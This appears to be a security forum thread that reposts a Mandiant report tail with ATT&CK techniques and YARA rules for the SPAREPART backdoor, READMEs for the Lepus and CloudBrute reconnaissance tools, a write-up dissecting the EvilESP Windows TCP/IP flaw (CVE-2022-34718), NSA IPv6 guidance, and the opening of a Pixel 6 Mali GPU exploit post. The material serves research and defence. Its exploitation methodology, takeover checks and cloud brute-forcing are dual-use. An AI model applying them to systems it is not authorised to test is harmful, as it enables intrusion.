PowerShell T1059.005: Visual Basic T1569.002: Service Execution Defense Evasion T1027: Obfuscated Files or Information T1055: Process Injection T1140: Deobfuscate/Decode Files or Information T1218.011: Rundll32 T1562.004: Disable or Modify System Firewall T1574.011: Services Registry Permissions Weakness Command and Control T1071.004: DNS T1090.003: Multi-hop Proxy T1095: Non-Application Layer Protocol T1573.002: Asymmetric Cryptography Resource Development T1587.002: Code Signing Certificates T1588.004: Digital Certificates T1608.003: Install Digital Certificate Detection Rules rule M_Backdoor_SPAREPART_SleepGenerator { meta: author = "Mandiant" date_created = "2022-12-14" description = "Detects the algorithm used to determine the next sleep timer" version = "1" weight = "100" hash = "f9cd5b145e372553dded92628db038d8" disclaimer = "This rule is meant for hunting and is not tested to run in a production environment." strings: $ = {C1 E8 06 89 [5] C1 E8 02 8B} $ = {c1 e9 03 33 c1 [3] c1 e9 05 33 c1 83 e0 01} $ = {8B 80 FC 00 00 00} $ = {D1 E8 [4] c1 E1 0f 0b c1} condition: all of them } rule M_Backdoor_SPAREPART_Struct { meta: author = "Mandiant" date_created = "2022-12-14" description = "Detects the PDB and a struct used in SPAREPART" hash = "f9cd5b145e372553dded92628db038d8" disclaimer = "This rule is meant for hunting and is not tested to run in a production environment." strings: $pdb = "c:\\Users\\user\\Desktop\\ImageAgent\\ImageAgent\\PreAgent\\src\\builder\\agent.pdb" ascii nocase $struct = { 44 89 ac ?? ?? ?? ?? ?? 4? 8b ac ?? ?? ?? ?? ?? 4? 83 c5 28 89 84 ?? ?? ?? ?? ?? 89 8c ?? ?? ?? ?? ?? 89 54 ?? ?? 44 89 44 ?? ?? 44 89 4c ?? ?? 44 89 54 ?? ?? 44 89 5c ?? ?? 89 5c ?? ?? 89 7c ?? ?? 89 74 ?? ?? 89 6c ?? ?? 44 89 74 ?? ?? 44 89 7c ?? ?? 44 89 64 ?? ?? 8b 84 ?? ?? ?? ?? ?? 44 8b c8 8b 84 ?? ?? ?? ?? ?? 44 8b c0 4? 8d 15 ?? ?? ?? ?? 4? 8b cd ff 15 ?? ?? ?? ?? } condition: (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $pdb and $struct and filesize < 20KB } Sursa: https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government
-
- 2
-
Lepus Lepus is a tool for enumerating subdomains, checking for subdomain takeovers and perform port scans - and boy, is it fast! Basic Usage lepus.py yahoo.com Summary Enumeration modes Subdomain Takeover Port Scan Installation Arguments Full command example Enumeration modes The enumeration modes are different ways lepus uses to identify sudomains for a given domain. These modes are: Collectors Dictionary Permutations Reverse DNS Markov Moreover: For all methods, lepus checks if the given domain or any generated potential subdomain is a wildcard domain or not. After identification, lepus collects ASN and network information for the identified domains that resolve to public IP Addresses. Collectors The Collectors mode collects subdomains from the following services: Service API Required AlienVault OTX No Anubis-DB No Bevigil Yes BinaryEdge Yes BufferOver Yes C99 Yes Censys Yes CertSpotter No CommonCrawl No CRT No DNSDumpster No DNSRepo Yes DNSTrails Yes Farsight DNSDB Yes FOFA Yes Fullhunt Yes HackerTarget No HunterIO Yes IntelX Yes LeakIX Yes Maltiverse No Netlas Yes PassiveTotal Yes Project Discovery Chaos Yes RapidDNS No ReconCloud No Riddler Yes Robtex Yes SecurityTrails Yes Shodan Yes SiteDossier No ThreatBook Yes ThreatCrowd No ThreatMiner No URLScan Yes VirusTotal Yes Wayback Machine No Webscout No WhoisXMLAPI Yes ZoomEye Yes You can add your API keys in the config.ini file. The Collectors module will run by default on lepus. If you do not want to use the collectors during a lepus run (so that you don't exhaust your API key limits), you can use the -nc or --no-collectors argument. Dictionary The dictionary mode can be used when you want to provide lepus a list of subdomains. You can use the -w or --wordlist argument followed by the file. A custom list comes with lepus located at lists/subdomains.txt. An example run would be: lepus.py -w lists/subdomains.txt yahoo.com Permutations The Permutations mode performs changes on the list of subdomains that have been identified. For each subdomain, a number of permutations will take place based on the lists/words.txt file. You can also provide a custom wordlist for permutations with the -pw or --permutation-wordlist argument, followed by the file name.An example run would be: lepus.py --permutate yahoo.com or lepus.py --permutate -pw customsubdomains.txt yahoo.com ReverseDNS The ReverseDNS mode will gather all IP addresses that were resolved and perform a reverse DNS on each one in order to detect more subdomains. For example, if www.example.com resolves to 1.2.3.4, lepus will perform a reverse DNS for 1.2.3.4 and gather any other subdomains belonging to example.com, e.g. www2,internal or oldsite. To run the ReverseDNS module use the --reverse argument. Additionally, --ripe (or -ripe) can be used in order to instruct the module to query the RIPE database using the second level domain for potential network ranges. Moreover, lepus supports the --ranges (or -r) argument. You can use it to make reverse DNS resolutions against CIDRs that belong to the target domain. By default this module will take into account all previously identified IPs, then defined ranges, then ranges identified through the RIPE database. In case you only want to run the module against specific or RIPE identified ranges, and not against all already identified IPs, you can use the --only-ranges (-or) argument. An example run would be: lepus.py --reverse yahoo.com or lepus.py --reverse -ripe -r 172.216.0.0/16,183.177.80.0/23 yahoo.com or only against the defined or identified from RIPE lepus.py --reverse -or -ripe -r 172.216.0.0/16,183.177.80.0/23 yahoo.com Hint: lepus will identify ASNs and Networks during enumeration, so you can also use these ranges to identify more subdomains with a subsequent run. Markov With this module, Lepus will utilize Markov chains in order to train itself and then generate subdomain based on the already known ones. The bigger the general surface, the better the tool will be able to train itself and subsequently, the better the results will be. The module can be activated with the --markovify argument. Parameters also include the Markov state size, the maximum length of the generated candidate addition, and the quantity of generated candidates. Predefined values are 3, 5 and 5 respectively. Those arguments can be changed with -ms (--markov-state), -ml (--markov-length) and -mq (--markov-quantity) to meet your needs. Keep in mind that the larger these values are, the more time Lepus will need to generate the candidates. It has to be noted that different executions of this module might generate different candidates, so feel free to run it a few times consecutively. Keep in mind that the higher the -ms, -ml and -mq values, the more time will be needed for candidate generation. lepus.py --markovify yahoo.com or lepus.py --markovify -ms 5 -ml 10 -mq 10 Subdomain Takeover Lepus has a list of signatures in order to identify if a domain can be taken over. You can use it by providing the --takeover argument. This module also supports Slack notifications, once a potential takeover has been identified, by adding a Slack token in the config.ini file. The checks are made against the following services: Acquia Activecampaign Aftership Aha! Airee Amazon AWS/S3 Apigee Azure Bigcartel Bitbucket Brightcove Campaign Monitor Cargo Collective Desk Feedpress Fly.io Getresponse Ghost.io Github Hatena Helpjuice Helpscout Heroku Instapage Intercom JetBrains Kajabi Kayako Launchrock Mashery Maxcdn Moosend Ning Pantheon Pingdom Readme.io Simplebooklet Smugmug Statuspage Strikingly Surge.sh Surveygizmo Tave Teamwork Thinkific Tictail Tilda Tumblr Uptime Robot UserVoice Vend Webflow Wishpond Wordpress Zendesk Port Scan The port scan module will check open ports against a target and log them in the results. You can use the --portscan argument which by default will scan ports 80, 443, 8000, 8080, 8443. You can also use custom ports or choose a predefined set of ports. Ports set Ports small 80, 443 medium (default) 80, 443, 8000, 8080, 8443 large 80, 81, 443, 591, 2082, 2087, 2095, 2096, 3000, 8000, 8001, 8008, 8080, 8083, 8443, 8834, 8888, 9000, 9090, 9443 huge 80, 81, 300, 443, 591, 593, 832, 981, 1010, 1311, 2082, 2087, 2095, 2096, 2480, 3000, 3128, 3333, 4243, 4567, 4711, 4712, 4993, 5000, 5104, 5108, 5800, 6543, 7000, 7396, 7474, 8000, 8001, 8008, 8014, 8042, 8069, 8080, 8081, 8088, 8090, 8091, 8118, 8123, 8172, 8222, 8243, 8280, 8281, 8333, 8443, 8500, 8834, 8880, 8888, 8983, 9000, 9043, 9060, 9080, 9090, 9091, 9200, 9443, 9800, 9943, 9980, 9981, 12443, 16080, 18091, 18092, 20720, 28017 An example run would be: lepus.py --portscan yahoo.com or lepus.py --portscan -p huge yahoo.com or lepus.py --portscan -p 80,443,8082,65123 yahoo.com Installation Normal installation: $ python3.7 -m pip install -r requirements.txt Preferably install in a virtualenv: $ pyenv virtualenv 3.7.4 lepus $ pyenv activate lepus $ pip install -r requirements.txt Installing latest python on debian: $ apt install build-essential zlib1g-dev libncurses5-dev libgdbm-dev libnss3-dev libssl-dev libreadline-dev libffi-dev libsqlite3-dev wget $ curl -O https://www.python.org/ftp/python/3.7.4/Python-3.7.4.tar.xz $ tar -xf Python-3.7.4.tar.xz $ cd Python-3.7.4 $ ./configure --enable-optimizations --enable-loadable-sqlite-extensions $ make $ make altinstall Arguments usage: lepus.py [-h] [-w WORDLIST] [-hw] [-t THREADS] [-nc] [-zt] [--permutate] [-pw PERMUTATION_WORDLIST] [--reverse] [-r RANGES] [--portscan] [-p PORTS] [--takeover] [--markovify] [-ms MARKOV_STATE] [-ml MARKOV_LENGTH] [-mq MARKOV_QUANTITY] [-f] [-v] domain Infrastructure OSINT positional arguments: domain domain to search optional arguments: -h, --help show this help message and exit -w WORDLIST, --wordlist WORDLIST wordlist with subdomains -hw, --hide-wildcards hide wildcard resolutions -t THREADS, --threads THREADS number of threads [default is 100] -nc, --no-collectors skip passive subdomain enumeration -zt, --zone-transfer attempt to zone transfer from identified name servers --permutate perform permutations on resolved domains -pw PERMUTATION_WORDLIST, --permutation-wordlist PERMUTATION_WORDLIST wordlist to perform permutations with [default is lists/words.txt] --reverse perform reverse dns lookups on resolved public IP addresses -ripe, --ripe query ripe database with the 2nd level domain for networks to be used for reverse lookups -r RANGES, --ranges RANGES comma seperated ip ranges to perform reverse dns lookups on -or, --only-ranges use only ranges provided with -r or -ripe and not all previously identifed IPs --portscan scan resolved public IP addresses for open ports -p PORTS, --ports PORTS set of ports to be used by the portscan module [default is medium] --takeover check identified hosts for potential subdomain take- overs --markovify use markov chains to identify more subdomains -ms MARKOV_STATE, --markov-state MARKOV_STATE markov state size [default is 3] -ml MARKOV_LENGTH, --markov-length MARKOV_LENGTH max length of markov substitutions [default is 5] -mq MARKOV_QUANTITY, --markov-quantity MARKOV_QUANTITY max quantity of markov results per candidate length [default is 5] -f, --flush purge all records of the specified domain from the database -v, --version show program's version number and exit Full command example The following, is an example run with all available active arguments: ./lepus.py python.org --wordlist lists/subdomains.txt --permutate -pw ~/mypermsword.lst --reverse -ripe -r 10.11.12.0/24 --portscan -p huge --takeover --markovify -ms 3 -ml 10 -mq 10 The following command flushes all database entries for a specific domain: ./lepus.py python.org --flush Sursa: https://github.com/GKNSB/Lepus
-
- 2
-
Dissecting and Exploiting TCP/IP RCE Vulnerability “EvilESP” Software Vulnerabilities January 20, 2023 By Valentina Palmiotti 10 min read September’s Patch Tuesday unveiled a critical remote vulnerability in tcpip.sys, CVE-2022-34718. The advisory from Microsoft reads: “An unauthenticated attacker could send a specially crafted IPv6 packet to a Windows node where IPsec is enabled, which could enable a remote code execution exploitation on that machine.” Pure remote vulnerabilities usually yield a lot of interest, but even over a month after the patch, no additional information outside of Microsoft’s advisory had been publicly published. From my side, it had been a long time since I attempted to do a binary patch diff analysis, so I thought this would be a good bug to do root cause analysis and craft a proof-of-concept (PoC) for a blog post. On October 21 of last year, I posted an exploit demo and root cause analysis of the bug. Shortly thereafter a blog post and PoC was published by Numen Cyber Labs on the vulnerability, using a different exploitation method than I used in my demo. In this blog — my follow-up article to my exploit video — I include an in-depth explanation of the reverse engineering of the bug and correct some inaccuracies I found in the Numen Cyber Labs blog. In the following sections, I cover reverse engineering the patch for CVE-2022-34718, the affected protocols, identifying the bug, and reproducing it. I’ll outline setting up a test environment and write an exploit to trigger the bug and cause a Denial of Service (DoS). Finally, I’ll look at exploit primitives and outline the next steps to turn the primitives into remote code execution (RCE). Patch Diffing Microsoft’s advisory does not contain any specific details of the vulnerability except that it is contained in the TCP/IP driver and requires IPsec to be enabled. In order to identify the specific cause of the vulnerability, we’ll compare the patched binary to the pre-patch binary and try to extract the “diff”(erence) using a tool called BinDiff. I used Winbindex to obtain two versions of tcpip.sys: one right before the patch and one right after, both for the same version of Windows. Getting sequential versions of the binaries is important, as even using versions a few updates apart can introduce noise from differences that are not related to the patch, and cause you to waste time while doing your analysis. Winbindex has made patch analysis easier than ever, as you can obtain any Windows binary beginning from Windows 10. I loaded both of the files in Ghidra, applied the Program Database (pdb) files, and ran auto analysis (checking aggressive instruction finder works best). Afterward, the files can be exported into a BinExport format using the extension BinExport for Ghidra. The files can then be loaded into BinDiff to create a diff and start analyzing their differences: BinDiff summary comparing the pre- and post-patch binaries BinDiff works by matching functions in the binaries being compared using various algorithms. In this case there, we have applied function symbol information from Microsoft, so all the functions can be matched by name. List of matched functions sorted by similarity Above we see there are only two functions that have a similarity less than 100%. The two functions that were changed by the patch are IppReceiveEsp and Ipv6pReassembleDatagram. Vulnerability Root Cause Analysis Previous research shows the Ipv6pReassembleDatagram function handles reassembling Ipv6 fragmented packets. The function name IppReceiveEsp seems to indicate this function handles the receiving of IPsec ESP packets. Before diving into the patch, I’ll briefly cover Ipv6 fragmentation and IPsec. Having a general understanding of these packet structures will help when attempting to reverse engineer the patch. IPv6 Fragmentation: An IPv6 packet can be divided into fragments with each fragment sent as a separate packet. Once all of the fragments reach the destination, the receiver reassembles them to form the original packet. The diagram below illustrates the fragmentation: Illustration of Ipv6 fragmentation According to the RFC, fragmentation is implemented via an Extension Header called the Fragment header, which has the following format: Ipv6 Fragment Header format Where the Next Header field is the type of header present in the fragmented data. IPsec (ESP): IPsec is a group of protocols that are used together to set up encrypted connections. It’s often used to set up Virtual Private Networks (VPNs). From the first part of patch analysis, we know the bug is related to the processing of ESP packets, so we’ll focus on the Encapsulating Security Payload (ESP) protocol. As the name suggests, the ESP protocol encrypts (encapsulates) the contents of a packet. There are two modes: in tunnel mode, a copy of IP header is contained in the encrypted payload, and in transport mode where only the transport layer portion of the packet is encrypted. Like IPv6 fragmentation, ESP is implemented as an extension header. According to the RFC, an ESP packet is formatted as follows: Top Level Format of an ESP Packet Where Security Parameters Index (SPI) and Sequence Number fields comprise the ESP extension header, and the fields between and including Payload Data and Next Header are encrypted. The Next Header field describes the header contained in Payload Data. Now with a primer of Ipv6 Fragmentation and IPsec ESP, we can continue the patch diff analysis by analyzing the two functions we found were patched. Ipv6pReassembleDatagram Comparing the side by side of the function graphs, we can see that a single new code block has been introduced into the patched function: Side-by-side comparison of the pre- and post-patch function graphs of Ipv6ReassembleDatagram Let’s take a closer look at the block: New code block in the patched function The new code block is doing a comparison of two unsigned integers (in registers EAX and EDX) and jumping to a block if one value is less than the other. Let’s take a look at that destination block: The target code has an unconditional call to the function IppDeleteFromReassemblySet. Taking a guess from the name of this function, this block seems to be for error handling. We can intuit that the new code that was added is some sort of bounds check, and there has been a “goto error” line inserted into the code, if the check fails. With this bit of insight, we can perform static analysis in a decompiler. 0vercl0ck previously published a blog post doing vulnerability analysis on a different Ipv6 vulnerability and went deep into the reverse engineering of tcpip.sys. From this work and some additional reverse engineering, I was able to fill in structure definitions for the undocumented Packet_t and Reassembly_t objects, as well as identify a couple of crucial local variable assignments. Decompilation output of Ipv6ReassembleDatagram In the above code snippet, the pink box surrounds the new code added by the patch. Reassembly->nextheader_offset contains the byte offset of the next_header field in the Ipv6 fragmentation header. The bounds check compares next_header_offset to the length of the header buffer. On line 29, HeaderBufferLen is used to allocate a buffer and on line 35, Reassembly->nextheder_offset is used to index and copy into the allocated buffer. Because this check was added, we now know there was a condition that allows nextheader_offset to exceed the header buffer length. We’ll move on to the second patched function to seek more answers. IppReceiveEsp Looking at the function graph side by side in the BinDiff workspace, we can identify some new code blocks introduced into the patched function: Side-by-side comparison of the pre- and post-patch function graphs of IppReceiveEsp The image below shows the decompilation of the function IppReceiveEsp, with a pink box surrounding the new code added by the patch. Decompilation output of IppReceiveESP Here, a new check was added to examine the Next Header field of the ESP packet. The Next Header field identifies the header of the decrypted ESP packet. Recall that a Next Header value can correspond to an upper layer protocol (such as TCP or UDP) or an extension header (such as fragmentation header or routing header). If the value in NextHeader is 0, 0x2B, or 0x2C, IppDiscardReceivedPackets is called and the error code is set to STATUS_DATA_NOT_ACCEPTED. These values correspond to IPv6 Hop-by-Hop Option, Routing Header for Ipv6, and Fragment Header for IPv6, respectively. Referring back to the ESP RFC it states, “In the IPv6 context, ESP is viewed as an end-to-end payload, and thus should appear after hop-by-hop, routing, and fragmentation extension headers.” Now the problem becomes clear. If a header of these types is contained within an ESP payload, it violates the RFC of the protocol, and the packet will be discarded. Putting It All Together Now that we have diagnosed the patches in two different functions, we can figure out how they are related. In the first function Ipv6ReassembleDatagram, we determined the fix was for a buffer overflow. Decompilation output of Ipv6ReassembleDatagram Recall that the size of the victim buffer is calculated as the size of the extension headers, plus the size of an Ipv6 header (Line 10 above). Now refer back to the patch that was inserted (Line 16). Reassembly->nextheader_offset refers to the offset of the Next Header value of the buffer holding the data for the fragment. Now refer back to the structure of an ESP packet: Top Level Format of an ESP Packet Notice that the Next Header field comes *after* Payload Data. This means that Reassembly->nextheader_offset will include the size of the Payload Data, which is controlled by the size of the data, and can be much greater than the size of the extension headers. The expected location of the Next Header field is inside an extension header or Ipv6 header. In an ESP packet, it is not inside the header, since it is actually contained in the encrypted portion of the packet. Illustrated root cause of CVE-2022-34718 Now refer back to line 35 of Ipv6ReassembleDatagram, this is where an out of bounds 1 byte write occurs (the size and value of NextHeader). Reproducing the Bug We now know the bug can be triggered by sending an IPv6 fragmented datagram via IPsec ESP packets. The next question to answer: how will the victim be able to decrypt the ESP packets? To answer this question, I first tried to send packets to a victim containing an ESP Header with junk data and put a breakpoint on to the vulnerable IppReceiveEsp function, to see if the function could be reached. The breakpoint was hit, but the internal function I thought did the decrypting IppReceiveEspNbl, returned an error, so the vulnerable code was never reached. I further reverse engineered IppReceiveEspNbl and worked my way through to find the point of failure. This is where I learned that in order to successfully decrypt an ESP packet, a security association must be established. A security association consists of a shared state, primarily cryptographic keys and parameters, maintained between two endpoints to secure traffic between them. In simple terms, a security association defines how a host will encrypt/decrypt/authenticate traffic coming from/going to another host. Security associations can be established via the Internet Key Exchange (IKE) or Authenticated IP Protocol. In essence, we need a way to establish a security association with the victim, so that it knows how to decrypt the incoming data from the attacker. For testing purposes, instead of implementing IKE, I decided to create a security association on the victim manually. This can be done using the Windows Filtering Platform WinAPI (WFP). Numen’s blog post stated that it’s not possible to use WFP for secret key management. However, that is incorrect and by modifying sample code provided by Microsoft, it’s possible to set a symmetric key that the victim will use to decrypt ESP packets coming from the attacker IP. Exploitation Now that the victim knows how to decrypt ESP traffic from us (the attacker) we can build malformed encrypted ESP packets using scapy. Using scapy we can send packets at the IP layer. The exploitation process is simple: CVE-2022-34718 PoC I create a set of fragmented packets from an ICMPv6 Echo request. Then for each fragment, they are encrypted into an ESP layer before sending. Primitive From the root cause analysis diagram pictured above, we know our primitive gives us an out of bounds write at offset = sizeof(Payload Data) + sizeof(Padding) + sizeof(Padding Length) The value of the write is controllable via the value of the Next Header field. I set this value on line 36 in my exploit above (0x41 ). Denial of Service (DoS) Corrupting just one byte into a random offset of the NetIoProtocolHeader2 pool (where the target buffer is allocated), usually does not immediately cause a crash. We can reliably crash the target by inserting additional headers within the fragmented message to parse, or by repeatedly pinging the target after corrupting a large portion of the pool. Limitations to Overcome For RCE offset is attacker controlled, however according to the ESP RFC, padding is required such that the Integrity Check Value (ICV) field (if present) is aligned on a 4-byte boundary. Because sizeof(Padding Length) = sizeof(Next Header) = 1, sizeof(Payload Data) + sizeof(Padding) + 2 must be 4 byte aligned. And therefore: offset = 4n - 1 Where n can be any positive integer, constrained by the fact the payload data and padding must fit within a single packet and is therefore limited by MTU (frame size). This is problematic because it means full pointers cannot be overwritten. This is limiting, but not necessarily prohibitive; we can still overwrite the offset of an address in an object, a size, a reference counter, etc. The possibilities available to us depend on what objects can be sprayed in the kernel pool where the victim headerBuff is allocated. Heap Grooming Research The affected kernel pool in WinDbg The victim out of bounds buffer is allocated in the NetIoProtocolHeader2 pool. The first steps in heap grooming research are: examine the type of objects allocated in this pool, what is contained in them, how they are used, and how the objects are allocated/freed. This will allow us to examine how the write primitive can be used to obtain a leak or build a stronger primitive. We are not necessarily restricted to NetIoProtocolHeader2. However, because the position of the victim out-of-bounds buffer cannot be predicted, and the address of surrounding pools is randomized, targeting other pools seems challenging. Demo Watch the demo exploiting CVE-2022-34718 ‘EvilESP’ for DoS below: Takeaways When laid out like this, the bug seems pretty simple. However, it took several long days of reverse engineering and learning about various networking stacks and protocols to understand the full picture and write a DoS exploit. Many researchers will say that configuring the setup and understanding the environment is the most time-consuming and tedious part of the process, and this was no exception. I am very glad that I decided to do this short project; I understand Ipv6, IPsec, and fragmentation much better now. To learn how IBM Security X-Force can help you with offensive security services, schedule a no-cost consult meeting here: IBM X-Force Scheduler. If you are experiencing cybersecurity issues or an incident, contact X-Force to help: U.S. hotline 1-888-241-9812 | Global hotline (+001) 312-212-8034. References https://www.rfc-editor.org/rfc/rfc8200#section-4.5 https://blog.quarkslab.com/analysis-of-a-windows-ipv6-fragmentation-vulnerability-cve-2021-24086.html https://doar-e.github.io/blog/2021/04/15/reverse-engineering-tcpipsys-mechanics-of-a-packet-of-the-death-cve-2021-24086/#diffing-microsoft-patches-in-2021 https://www.iana.org/assignments/protocol-numbers/protocol-numbers.xhtml https://datatracker.ietf.org/doc/html/rfc4303 https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-34718 Sursa: https://securityintelligence.com/posts/dissecting-exploiting-tcp-ip-rce-vulnerability-evilesp/
-
- 1
-
Executive summary Nearly all networked devices use the Internet Protocol (IP) for their communications. IP version 6 (IPv6) is the current version of IP and provides advantages over the legacy IP version 4 (IPv4). Most notably, the IPv4 address space is inadequate to support the increasing number of networked devices requiring routable IP addresses, whereas IPv6 provides a vast address space to meet current and future needs. While some technologies, such as network infrastructure, are more affected by IPv6 than others, nearly all networked hardware and software are affected in some way as well. As a result, IPv6 has broad impact on cybersecurity that organizations should address with due diligence. IPv6 security issues are quite similar to those from IPv4. That is, the security methods used with IPv4 should typically be applied to IPv6 with adaptations as required to address the differences with IPv6. Security issues associated with an IPv6 implementation will generally surface in networks that are new to IPv6, or in early phases of the IPv6 transition. These networks lack maturity in IPv6 configurations and network security tools. More importantly, they lack overall experience by the administrators in the IPv6 protocol. Dual stacked networks (that run both IPv4 and IPv6 simultaneously) have additional security concerns, so further countermeasures are needed to mitigate these risks due to the increased attack surface of having both IPv4 and IPv6. Download: https://media.defense.gov/2023/Jan/18/2003145994/-1/-1/0/CSI_IPV6_SECURITY_GUIDANCE.PDF
-
CloudBrute A tool to find a company (target) infrastructure, files, and apps on the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode). The outcome is useful for bug bounty hunters, red teamers, and penetration testers alike. The complete writeup is available. here At a glance Motivation While working on HunterSuite, and as part of the job, we are always thinking of something we can automate to make black-box security testing easier. We discussed this idea of creating a multiple platform cloud brute-force hunter.mainly to find open buckets, apps, and databases hosted on the clouds and possibly app behind proxy servers. Here is the list issues we tried to fix: separated wordlists lack of proper concurrency lack of supporting all major cloud providers require authentication or keys or cloud CLI access outdated endpoints and regions Incorrect file storage detection lack support for proxies (useful for bypassing region restrictions) lack support for user agent randomization (useful for bypassing rare restrictions) hard to use, poorly configured Features Cloud detection (IPINFO API and Source Code) Supports all major providers Black-Box (unauthenticated) Fast (concurrent) Modular and easily customizable Cross Platform (windows, linux, mac) User-Agent Randomization Proxy Randomization (HTTP, Socks5) Supported Cloud Providers Microsoft: Storage Apps Amazon: Storage Apps Google: Storage Apps DigitalOcean: storage Vultr: Storage Linode: Storage Alibaba: Storage Version 1.0.0 Usage Just download the latest release for your operation system and follow the usage. To make the best use of this tool, you have to understand how to configure it correctly. When you open your downloaded version, there is a config folder, and there is a config.YAML file in there. It looks like this providers: ["amazon","alibaba","amazon","microsoft","digitalocean","linode","vultr","google"] # supported providers environments: [ "test", "dev", "prod", "stage" , "staging" , "bak" ] # used for mutations proxytype: "http" # socks5 / http ipinfo: "" # IPINFO.io API KEY For IPINFO API, you can register and get a free key at IPINFO, the environments used to generate URLs, such as test-keyword.target.region and test.keyword.target.region, etc. We provided some wordlist out of the box, but it's better to customize and minimize your wordlists (based on your recon) before executing the tool. After setting up your API key, you are ready to use CloudBrute. ██████╗██╗ ██████╗ ██╗ ██╗██████╗ ██████╗ ██████╗ ██╗ ██╗████████╗███████╗ ██╔════╝██║ ██╔═══██╗██║ ██║██╔══██╗██╔══██╗██╔══██╗██║ ██║╚══██╔══╝██╔════╝ ██║ ██║ ██║ ██║██║ ██║██║ ██║██████╔╝██████╔╝██║ ██║ ██║ █████╗ ██║ ██║ ██║ ██║██║ ██║██║ ██║██╔══██╗██╔══██╗██║ ██║ ██║ ██╔══╝ ╚██████╗███████╗╚██████╔╝╚██████╔╝██████╔╝██████╔╝██║ ██║╚██████╔╝ ██║ ███████╗ ╚═════╝╚══════╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚══════╝ V 1.0.7 usage: CloudBrute [-h|--help] -d|--domain "<value>" -k|--keyword "<value>" -w|--wordlist "<value>" [-c|--cloud "<value>"] [-t|--threads <integer>] [-T|--timeout <integer>] [-p|--proxy "<value>"] [-a|--randomagent "<value>"] [-D|--debug] [-q|--quite] [-m|--mode "<value>"] [-o|--output "<value>"] [-C|--configFolder "<value>"] Awesome Cloud Enumerator Arguments: -h --help Print help information -d --domain domain -k --keyword keyword used to generator urls -w --wordlist path to wordlist -c --cloud force a search, check config.yaml providers list -t --threads number of threads. Default: 80 -T --timeout timeout per request in seconds. Default: 10 -p --proxy use proxy list -a --randomagent user agent randomization -D --debug show debug logs. Default: false -q --quite suppress all output. Default: false -m --mode storage or app. Default: storage -o --output Output file. Default: out.txt -C --configFolder Config path. Default: config for example CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w "./data/storage_small.txt" please note -k keyword used to generate URLs, so if you want the full domain to be part of mutation, you have used it for both domain (-d) and keyword (-k) arguments If a cloud provider not detected or want force searching on a specific provider, you can use -c option. CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w -c amazon -o target_output.txt Dev Clone the repo go build -o CloudBrute main.go go test internal in action How to contribute Add a module or fix something and then pull request. Share it with whomever you believe can use it. Do the extra work and share your findings with community ♥ FAQ How to make the best out of this tool? Read the usage. I get errors; what should I do? Make sure you read the usage correctly, and if you think you found a bug open an issue. When I use proxies, I get too many errors, or it's too slow? It's because you use public proxies, use private and higher quality proxies. You can use ProxyFor to verify the good proxies with your chosen provider. too fast or too slow ? change -T (timeout) option to get best results for your run. Credits Inspired by every single repo listed here . Sursa: https://github.com/0xsha/CloudBrute
-
- 4
-
Pwning the all Google phone with a non-Google bug It turns out that the first “all Google” phone includes a non-Google bug. Learn about the details of CVE-2022-38181, a vulnerability in the Arm Mali GPU. Join me on my journey through reporting the vulnerability to the Android security team, and the exploit that used this vulnerability to gain arbitrary kernel code execution and root on a Pixel 6 from an Android app. Author Man Yue Mo January 23, 2023 The “not-Google” bug in the “all-Google” phone The year is 2021 A.D. The first “all Google” phone, the Pixel 6 series, made entirely by Google, is launched. Well not entirely… One small GPU chip still holds out. And life is not easy for security researchers who audit the fortified camps of Midgard, Bifrost, and Valhall.1 An unfortunate security researcher was about to learn this the hard way as he wandered into the Arm Mali regime: CVE-2022-38181 In this post I’ll cover the details of CVE-2022-38181, a vulnerability in the Arm Mali GPU that I reported to the Android security team on 2022-07-12 along with a proof-of-concept exploit that used this vulnerability to gain arbitrary kernel code execution and root privileges on a Pixel 6 from an Android app. The bug was assigned bug ID 238770628. After initially rating it as a High-severity vulnerability, the Android security team later decided to reclassify it as a “Won’t fix” and they passed my report to Arm’s security team. I was eventually able to get in touch with Arm’s security team to independently follow up on the issue. The Arm security team were very helpful throughout and released a public patch in version r40p0 of the driver on 2022-10-07 to address the issue, which was considerably quicker than similar disclosures that I had in the past on Android. A coordinated disclosure date of around mid-November was also agreed to allow time for users to apply the patch. However, I was unable to connect with the Android security team and the bug was quietly fixed in the January update on the Pixel devices as bug 259695958. Neither the CVE ID, nor the bug ID (the original 238770628 and the new 259695958) were mentioned in the security bulletin. Our advisory, including the disclosure timeline, can be found here. The Arm Mali GPU The Arm Mali GPU is a “device-specific” hardware component which can be integrated into various devices, ranging from Android phones to smart TV boxes. For example, all of the international versions of the Samsung S series phones, up to S21 use the Mali GPU, as well as the Pixel 6 series. For additional examples, see “implementations” in Mali(GPU) Wikipedia entry for some specific devices that use the Mali GPU. As explained in my other post, GPU drivers on Android are a very attractive target for an attacker, as they can be reached directly from the untrusted app domain and most Android devices use either Qualcomm’s Adreno GPU, or the Arm Mali GPU, meaning that relatively few bugs can cover a large number of devices. In fact, of the seven Android 0-days that were detected as exploited in the wild in 2021– five targeted GPU drivers. Another more recent bug that was exploited in the wild – CVE-2021-39793, disclosed in March 2022 – also targeted a GPU driver. Together, of these six bugs that were exploited in the wild that targeted Android GPU drivers, three bugs targeted the Qualcomm GPU, while the other three targeted the Arm Mali GPU. Due to the complexity involved in managing memory sharing between user space applications and the GPU, many of the vulnerabilities in the Arm Mali GPU involve the memory management code. The current vulnerability is another example of this, and involves a special type of GPU memory: the JIT memory. Contrary to the name, JIT memory does not seem to be related to JIT compiled code, as it is created as non-executable memory. Instead, it seems to be used for memory caches, managed by the GPU kernel driver, that can readily be shared with user applications and returned to the kernel when memory pressure arises. Many other types of GPU memory are created directly using ioctl calls like KBASE_IOCTL_MEM_IMPORT. (See, for example, the section “Memory management in the Mali kernel driver” in my previous post.) This, however, is not the case for JIT memory regions, which are created by submitting a special GPU instruction using the KBASE_IOCTL_JOB_SUBMIT ioctl call. The KBASE_IOCTL_JOB_SUBMIT ioctl can be used to submit a “job chain” to the GPU for processing. Each job chain is basically a list of jobs, which are opaque data structures that contain job headers, followed by payloads that contain the specific instructions. For an example, see the Writing to GPU memory section in my previous post. While the KBASE_IOCTL_JOB_SUBMIT is normally used for sending instructions to the GPU itself, there are also some jobs that are implemented in the kernel and run on the host (CPU) instead. These are the software jobs (“softjobs”) and among 